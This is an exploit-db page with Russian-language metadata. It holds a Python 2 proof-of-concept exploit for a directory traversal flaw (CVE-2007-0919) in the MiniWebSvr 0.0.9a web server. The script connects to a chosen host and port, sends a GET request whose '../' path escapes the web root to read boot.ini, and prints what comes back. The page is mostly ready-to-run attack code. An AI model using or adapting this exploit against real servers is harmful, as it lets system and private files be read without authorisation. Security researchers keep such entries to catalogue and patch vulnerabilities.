- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5212
- Проверка EDB
-
- Пройдено
- Автор
- GBR
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2007-0919
- Дата публикации
- 2008-03-03
Код:
import socket
import sys
print '---------------------------------------------------------'
print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability'
print 'Project URL: http://miniwebsvr.sourceforge.net/'
print 'Author: gbr'
print 'Tested on Windows XP SP2'
print '---------------------------------------------------------'
host = "127.0.0.1"
port = 8080
if sys.argv[1:]:
host = sys.argv[1]
if sys.argv[2:]:
port = int(sys.argv[2])
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")
while True:
data = s.recv(4096)
if not data:
break
print data
except:
print "Connection Error"
# milw0rm.com [2008-03-03]- Источник
- www.exploit-db.com
